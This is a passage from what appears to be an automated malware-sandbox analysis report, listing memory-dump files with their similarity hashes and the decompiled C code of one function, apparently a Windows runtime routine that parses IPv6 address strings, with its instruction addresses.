                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                      • API String ID: 0-3177188983
                                      • Opcode ID: 24b091bd71a486427692f121ee1a3adf808841161547f0f1e85a86502133c496
                                      • Instruction ID: 10391aab37d86ac0652d09d32415b239b22b634e75c2ce8edc16df85a81aa95b
                                      • Opcode Fuzzy Hash: 24b091bd71a486427692f121ee1a3adf808841161547f0f1e85a86502133c496
                                      • Instruction Fuzzy Hash: 0441EDB0600205ABDB24DF64CC89FAA77A9FF84720F148A05F959DB2C0D774E941CB6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 025CFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E025CFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E025CEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E025CEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E025C685D(_t167, 4) == 0) {
								if(E025C685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E025C685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E025C685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E025A8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0259DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E025CEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E025CEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                      0x025cfcd1
                                      0x025cfcd6
                                      0x025cfcd9
                                      0x025cfcdc
                                      0x025cfcdf
                                      0x025cfce2
                                      0x025cfce5
                                      0x025cfce8
                                      0x025cfceb
                                      0x025cfced
                                      0x025cfced
                                      0x025cfcf3
                                      0x00000000
                                      0x00000000
                                      0x025cfcfc
                                      0x025cfcfe
                                      0x025cfdc1
                                      0x025fecbd
                                      0x00000000
                                      0x025feccc
                                      0x025feccc
                                      0x025fecd2
                                      0x00000000
                                      0x00000000
                                      0x025fecdf
                                      0x025fece0
                                      0x025fece4
                                      0x025feceb
                                      0x025fecee
                                      0x025feca8
                                      0x025feca8
                                      0x025fecaa
                                      0x025cfd76
                                      0x025cfd79
                                      0x025cfdb4
                                      0x025cfdb5
                                      0x025cfdb6
                                      0x00000000
                                      0x025cfdb6
                                      0x025cfd7e
                                      0x025fecfc
                                      0x025cfe2f
                                      0x00000000
                                      0x025cfe2f
                                      0x025fed08
                                      0x025fed0f
                                      0x025fed17
                                      0x025fed1b
                                      0x00000000
                                      0x025fed1b
                                      0x025cfd88
                                      0x00000000
                                      0x00000000
                                      0x025cfd94
                                      0x025cfd99
                                      0x025cfda1
                                      0x00000000
                                      0x00000000
                                      0x025cfdb0
                                      0x00000000
                                      0x025cfdb0
                                      0x025fecbd
                                      0x025cfdc7
                                      0x025cfdcb
                                      0x00000000
                                      0x025cfdd7
                                      0x025cfde3
                                      0x025cfe06
                                      0x025e1fe7
                                      0x00000000
                                      0x00000000
                                      0x025e1fef
                                      0x025e1ff0
                                      0x025e1ff4
                                      0x025e1ff7
                                      0x025e1ffa
                                      0x025e1ffd
                                      0x025e2000
                                      0x00000000
                                      0x00000000
                                      0x025fecf1
                                      0x00000000
                                      0x025fecf1
                                      0x00000000
                                      0x025cfe06
                                      0x025cfde8
                                      0x025cfdec
                                      0x025cfdef
                                      0x025cfdf2
                                      0x00000000
                                      0x025cfdf2
                                      0x025cfdcb
                                      0x025cfd04
                                      0x025cfd05
                                      0x025fec67
                                      0x00000000
                                      0x00000000
                                      0x025fec6f
                                      0x00000000
                                      0x025fec6f
                                      0x025cfd13
                                      0x025cfd3c
                                      0x025cfd40
                                      0x025fec75
                                      0x025fec7a
                                      0x00000000
                                      0x025fec8a
                                      0x025fec8a
                                      0x025fec90
                                      0x025fecb2
                                      0x025cfd73
                                      0x025cfd73
                                      0x00000000
                                      0x025cfd73
                                      0x025fec95
                                      0x00000000
                                      0x00000000
                                      0x025feca1
                                      0x025feca4
                                      0x025feca5
                                      0x00000000
                                      0x025feca5
                                      0x025fec7a
                                      0x025cfd4a
                                      0x00000000
                                      0x025cfd6e
                                      0x025cfd6e
                                      0x025cfd71
                                      0x00000000
                                      0x025cfd71
                                      0x025cfd4a
                                      0x025cfd21
                                      0x025da3a1
                                      0x00000000
                                      0x025da3a1
                                      0x025cfd36
                                      0x025e200b
                                      0x025e2012
                                      0x00000000
                                      0x00000000
                                      0x025e2018
                                      0x00000000
                                      0x025e2018
                                      0x00000000
                                      0x025cfd36
                                      0x025cfe0f
                                      0x025cfe16
                                      0x025da3ad
                                      0x00000000
                                      0x00000000
                                      0x025da3b3
                                      0x025da3b3
                                      0x025cfe1f
                                      0x025fed25
                                      0x025fed86
                                      0x00000000
                                      0x00000000
                                      0x025fed91
                                      0x025fed95
                                      0x025fed95
                                      0x025fed9a
                                      0x025fedad
                                      0x025fedb3
                                      0x025fedba
                                      0x025fedc4
                                      0x025fedc9
                                      0x00000000
                                      0x025fedcc
                                      0x025fed2a
                                      0x025fed55
                                      0x00000000
                                      0x00000000
                                      0x025fed61
                                      0x025fed66
                                      0x025fed6e
                                      0x00000000
                                      0x00000000
                                      0x025fed7d
                                      0x00000000
                                      0x025fed7d
                                      0x025fed30
                                      0x00000000
                                      0x00000000
                                      0x025fed3c
                                      0x025fed43
                                      0x025fed4b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: __fassign
                                      • String ID:
                                      • API String ID: 3965848254-0
                                      • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                      • Instruction ID: dbb6071de25c8a600b18edfe1c75d2887b874fa438560ba4d7020d93dc6c19fc
                                      • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                      • Instruction Fuzzy Hash: 7E918B71D0020AEFDF65CF98C8456AEBBB6FB85309F30846FD405A6591F7304A81CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%